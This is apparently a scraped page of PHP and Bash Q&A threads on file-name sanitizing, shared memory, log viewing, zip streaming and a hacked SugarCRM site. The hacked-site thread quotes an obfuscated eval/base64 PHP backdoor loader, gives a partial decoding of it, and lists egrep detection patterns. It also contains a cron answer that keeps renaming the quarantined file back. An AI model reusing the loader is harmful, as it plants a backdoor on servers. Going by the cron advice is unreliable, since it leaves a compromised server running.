Bash sanitize_file_name function

Bash sanitize_file_name function - php

I'm attempting to find a way to sanitize/filter file names in a Bash script the exact same way as the sanitize_file_name function from WordPress works. It has to take a filename string and spit out a clean version that is identical to that function.
You can see the function here.
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
Ubuntu 14.04.5 LTS (GNU/Linux 3.13.0-57-generic x86_64)
This is perl 5, version 18, subversion 2 (v5.18.2) built for x86_64-linux-gnu-thread-multi
Example input file names
These can be and often are practically anything you can make a filename on any operating system, especially Mac and Windows.
This File + Name.mov
Some, Other - File & Name.mov
ANOTHER FILE 2 NAME vs2_.m4v
some & file-name Alpha.m4v
Some Strange & File ++ Name__.mp4
This is a - Weird -# Filename!.mp4
Example output file names
These are how the WordPress sanitize_file_name function makes the examples above.
This-File-Name.mov
Some-Other-File-Name.mov
ANOTHER-FILE-2-NAME-vs2_.m4v
some-file-name-Alpha.m4v
Some-Strange-File-Name__.mp4
This-is-a-Weird-#-Filename.mp4
It doesn't just have to solve these cases, it has perform the same functions that the sanitize_file_name function does or it will produce duplicate files and they won't be updated on the site.
Some thoughts I've had are maybe I can somehow use that function itself but this video encoding server doesn't have PHP on it since it's quite a tiny server and normally just encodes videos and uploads them. It doesn't have much memory, CPU power or disk space, it's a DigitalOcean 512MB RAM server. Maybe I can somehow create a remote PHP script on the web server to handle it through HTTP but again I'm not entirely sure how to do that either through Bash.
It's too complicated for my limited Bash skills so I'm wondering if anyone can help or knows where a script is that does this already. I couldn't find one. All I could find are scripts that change spaces or special characters into underscores or dashes. But this isn't all the sanitize_file_name function does.
In case you are curious, the filenames have to be compatible with this WordPress function because of the way this website is setup to handle videos. It allows people to upload videos through WordPress that are then sent to a separate video server for encoding and then sent to Amazon S3 and CloudFront for serving on the site. However it also allows adding videos through Dropbox using the External Media plugin (which actually is duplicating the video upload with the Dropbox sync now but that's another minor issue). This video server is also syncing to a Dropbox account and whitelisting the folders in it and has this Bash script watching a VideoServer Dropbox folder using inotifywait which copies videos from it to another folder temporarily where the video encoder encodes them. This way when they update the videos in their Dropbox it will automatically re-encode and update the video shown on the site. They could just upload the files through WordPress but they don't seem to want to or don't know how to do that for some reason.

If you have Perl installed, try with:
#!/bin/bash
function sanitize_file_name {
echo -n $1 | perl -pe 's/[\?\[\]\/\\=<>:;,''"&\$#*()|~`!{}%+]//g;' -pe 's/[\r\n\t -]+/-/g;'
}
filename="Wh00t? it's a -- re#lly-weird {file&name} (with + Plus and__1% #of# [\$qRots\$!]).mov"
cleaned=$(sanitize_file_name "$filename")
echo original : "$filename"
echo sanitised: "$cleaned"
Result is:
original : Wh00t? it's a -- re#lly-weird {file&name} (with + Plus and__1% #of# [$qRots$!]).mov
sanitised: Wh00t-it's-a-re#lly-weird-filename-with-Plus-and__1-of-qRots.mov
Looking at WP function, this emulates it quite well.

Inspired by the answer.
EscapeFilename()
{
printf '%s' "$#" | perl -pe 's/[:;,\?\[\]\/\\=<>''"&\$#*()|~`!{}%+]//g; s/[\s-]+/-/g;';
}

Related

PHP / C++: shm_open() error when sharing memory

I've been all over the internet looking for an answer to my problem. Here is the setup, I am running embedded Linux (created with Yocto) which is running the Lighttpd web server with PHP5. In my C++ code I have the following:
shared = shm_open(SHARED_FILE_NAME, O_RDWR | O_CREAT | O_TRUNC, 0666);
ftruncate(shared, FILE_SIZE);
map = mmap(...);
// shm_unlink() isn't called until my C++ thread ends.
Everything works well and I do not get any errors and other C++ processes and threads are also able to access the shared memory and map without any problems (I have one writer thread and all other threads and processes do a read only on the memory). The memory is used as a ring buffer where the writing thread is updating data very quickly. The problems start to occur when trying to access that same memory in PHP. In PHP I do (need read only):
<?php
$shm_key = ftok("/dev/shm/shared_file.shm", 'c');
$shm_id = shm_open($shm_key, "a", 0, 0);
...
?>
When looking at the value from ftok() it returns a non -1 number which means it did not fail. I do get a fail on the PHP's shm_open() call which reads:
Warning: shmop_open(): unable to attach or create shared memory segment in /www/pages/shared.php on line 9
I've changed the permission of the file with chmod 777 /dev/shm/shared.shm just to rule out any file permission issues. Also when I run ipcs -m I do not get any listings for shared memory segments, yet my C++ code is running just fine. I've also looked for SELinux and tried entering setenforce 0 but I get a response of -sh: setenforce: command not found so I figure this isn't an issue. I've also tried running wget <local ip address>/shared.php to see if running locally would return the correct data but when looking at the file which was returned it had the same error messages.
I am looking to be able to have a web page on my embedded system read this shared memory and stream back chunks of binary to feed a graph when a request comes in (not interested in web sockets at the time). I am able to get named pipes to work across PHP and C++ just fine but I need shared memory for this application and the shared memory access seems to be troublesome. Any help is appreciated.

I'm developing PHP functions that need to use C Shared Memory. As your code, my C functions use shm_open, mmap, etc.. and I guess to use PHP ftok(), shmop_open() to access the C's shared memory but this PHP functions don't work.
The two area are not compatible. I found different properties of the two areas in this documents http://menehune.opt.wfu.edu/Kokua/More_SGI/007-2478-008/sgi_html/ch03.html:
C (with shm_open, mmap, like the Straton source code) use “POSIX Shared Memory”
PHP (with shmop_* functions) use “System V Shared Memory”
I suggest you to try with Sync http://php.net/manual/en/book.sync.php: you need the PECL sync extension.

php file automatically renamed to php.suspected

Since last 4 days, we are facing strange issue on our Production server (AWS EC2 instance) specific to only one site which is SugarCRM.
Issue is /home/site_folder/public_html/include/MassUpdate.php file is renamed automatically to /home/site_folder/public_html/include/MassUpdate.php.suspected
This happens 2-3 times in a day with 3-4 hours of gap. This issue occurs only in case of specific site, even it doesn't occur for staging replica of the same site. I even checked code of that file from both sites, it's same.
We have Googled and found, such issue occurs mostly for Wordpress sites and it could be because of attack. But we checked our server against the attack, there isn't any. Also there is no virus/malware scan running on server.
What should we do?
Update:
We found few things after going through this link
We executed egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/ And found that there are few files with following sample code.
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
Seems some malware, how we go about removing it permanently?
Thanks

The renaming of .php files to .php.suspected keeps happening today. The following commands should not come up with something:
find <web site root> -name '*.suspected' -print
find <web site root> -name '.*.ico' -print
In my case, the infected files could be located with the following commands:
cd <web site root>
egrep -Rl '\$GLOBALS.*\\x'
egrep -Rl -Ezo '/\*(\w+)\*/\s*#include\s*[^;]+;\s*/\*'
egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'
I have prepared a longer description of the problem and how to deal with it at GitHub.

It's somewhat obfuscated, but I've de-obfuscated it.The function flnftovr takes a string and an array as arguments. It creates a new string $ggy using the formula
isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}
It then preppends base64_decode to the string.
The string is $s, the array is $koicev. It then evals the result of this manipulation. So eventually a string gets created:
base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)
So what actually gets run on your server is:
#ini_set('error_log', NULL);
#ini_set('log_errors', 0);
#ini_set('max_execution_time', 0);
#set_time_limit(0);
if(isset($_SERVER)
encode(serialize($res));
}
If you didn't create this and you suspect your site has been hacked, I'd suggest you wipe the server, and create a new installation of whatever apps are running on your server.

Renaming php files to php.suspected is usually intended and done by hacker's script. They change file extension to give the impression that the file was checked by some antimalware software, is secure and can't be executed. But, in fact, isn't. They change extension to "php" anytime they want to invoke the script and after it, they change the extension back to "suspected".
You can read about it on Securi Research Labs
Maybe this post is old but the topic is still alive. Especially according to June 2019 malware campaign targeting WordPress plugins. I found a few "suspected" files in my client's WordPress subdirectories (e.g. wp-content)

Posting this answer, it may help others.
Create a file with '.sh' extension at your convenient location.
Add following code in it.
#Rename your_file_name.php.suspected to your_file_name.php
mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php
Save this file.
Set cron for every 10 minute (or whatever interval you need), using following line in crontab
*/10 * * * * path_to_cron_file.sh
Restart crontab service.
You will get lot of documentation on creating cron on Google.

PHP: Save Dynamic URL Image to Disk

Having trouble capturing the following dynamic image on disk, all I get is a 1K size file
http://water.weather.gov/precip/save.php?timetype=RECENT&loctype=NWS&units=engl&timeframe=current&product=observed&loc=regionER
I have setup PHP cURL feature to work just fine on static imagery, but does not work for the above link. Similarly, also copy function, file_put_contents (file_get_contents)...they all work fine for static image. Plenty of references in SO for usage of these PHP functions, so I will not get into details here. Just the copy command:
copy('http://water.weather.gov/precip/save.php?timetype=RECENT&loctype=NWS&units=engl&timeframe=current&product=observed&loc=regionER', 'precip5.png');
Behavior is same, getting precip5.png size 760 bytes, on my windows development box and linux staging box, so can rule OS issues out. Again, all PHP functions do exactly the same thing - generate a file - but empty. Command line curl program is also generating that same junk 1K file.
So, the issue seems to be source and the best I can tell is that it is a dynamic (streaming?) image.
Ideally, I would like this be done in PHP or some command line utility like curl. I am trying to avoid adding java (imageio) dependency just for this...until I absolutely have have to go there...
I am trying to understand the nature of the beast (the image) first ;-)...

The URL you are saving produces HTML output, not the image. You are missing the parameter &print=1
http://water.weather.gov/precip/save.php?timetype=RECENT&loctype=NWS&units=engl&timeframe=current&product=observed&loc=regionER&print=1

How to view PHP or Apache error log online in a browser?

Is there a way to view the PHP error logs or Apache error logs in a web browser?
I find it inconvenient to ssh into multiple servers and run a "tail" command to follow the error logs. Is there some tool (preferably open source) that shows me the error logs online (streaming or non-streaming?
Thanks

A simple php code to read log and print:
<?php
exec('tail /var/log/apache2/error.log', $error_logs);
foreach($error_logs as $error_log) {
echo "<br />".$error_log;
}
?>
You can embed error_log php variable in html as per your requirement. The best part is tail command will load the latest errors which wont make too load on your server.
You can change tail to give output as you want
Ex. tail myfile.txt -n 100 // it will give last 100 lines

See What commercial and open source competitors are there to Splunk? and I would recommend https://github.com/tobi/clarity
Simple and easy tool.

Since everyone is suggesting clarity, I would also like to mention tailon. I wrote tailon as a more modern and secure alternative to clarity. It's still in its early stages of development, but the functionality you need is there. You may also use wtee, if you're only interested in following a single log file.

You good make a script that reads the error logs from apache2..
$apache_errorlog = file_get_contents('/var/log/apache2/error.log');
if its not working.. trying to get it with the php functions exec or shell_exec and the command 'cat /var/log/apache2/error.log'
EDIT: If you have multi servers(i quess with webservers on it) you can create a file on the machine, when you make a request to that script(hashed connection) you get the logs from that server

I recommend LogHappens: https://loghappens.com, it allows you to view the error log in web, and this is what it looks like:
LogHappens supports kinds of web server log format, it comes with parses for Apache and CakePHP, and you can write your own.
You can find it here: https://github.com/qijianjun/logHappens
It's open source and free, I forked it and do some work to make it work better in dev env or in public env. That is:
Support token for security, one can't access the site without the token in config.php
Support IP whitelists for security and privacy
Sopport config the interval between ajax requests
Support load static files from local (for local dev env)

I've found this solution https://code.google.com/p/php-tail/
It's working perfectly. I only needed to change the filesize, because I was getting an error first.
56 if($maxLength > $this->maxSizeToLoad) {
57 $maxLength = $this->maxSizeToLoad;
58 // return json_encode(array("size" => $fsize, "data" => array("ERROR: PHPTail attempted to load more (".round(($maxLength / 1048576), 2)."MB) then the maximum size (".round(($this->maxSizeToLoad / 1048576), 2) ."MB) of bytes into memory. You should lower the defaultUpdateTime to prevent this from happening. ")));
59 }
And I've added default size, but it's not needed
125 lastSize = <?php echo filesize($this->log) || 1000; ?>;

I know this question is a bit old, but (along with the lack of good choices) it gave me the idea to create this tiny (open source) web app. https://github.com/ToX82/logHappens. It can be used online, but I'd use an .htpasswd as a basic login system. I hope it helps.

PHP: Problem using passthru to stream a zip on mac os x only

I'm trying to put together a zip streaming solution through the use of Unix's zip command and PHP's passthru function, but I've hit a snag.
The script looks something like this:
<?php
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachement; filename=myfile.zip");
passthru("zip -r -0 - /stuff/to/zip/");
exit();
?>
The zip command works OK and the output is received by the browser and saved as a zip file.
The zip can then be extracted fine on Windows and Unix, but on Mac OS X the build in extractor (BOMArchiveHelper) can't extract the file. Using other applications on OS X works fine though.
The error given by BOMArchiveHelper is the same it gives if a zip is password protected (not handled by the application). I used some kind of zip analyzer program and it indicated that some of the files in the zip archive were flagged as password protected.
Like I said though, no other extraction application pays attention to that apparently.
When examening the zip closer I found that the one generated by the PHP files is a few bytes larger than one generated directly by the zip command on the server.
It seems that the stream process with passthru adds something to the file that probably causes the problems with BOMArchiveHelper.
To test this, I used passthru to stream a zip I had already created on the server: passthru("cat stuff.zip")
That worked fine with BOMArchiveHelper.
So the problem seems to lie somewhere in the process where the passthru function takes the binary data generated on the fly by the zip command and passes that to the browser.
I've tried to eliminate all the sources where the extra bytes could be generated (setting zip command to quiet and so on), but the added data still remains.
A binary diff of the streamed zip and a pre generated zip shows that the extra data is scattered all over the zip, not just in the end or the beginning.
Anyone have a clue, or seen this problem before and decided it's impossible to solve?
NB: Since someone else has already encountered and very well described this issue before me without any answer I just copied/paste his message here and made sure that all his tests did effectively fail and neither any of mine passed ...
Apparently the only way to get this to work would be to ask people to use either unzip or suffitexpander ...

If you are using nginx then take a look at http://wiki.nginx.org/NginxNgxZip

We Keep Coding

PHP, A popular general-purpose scripting language that is especially suited to web development.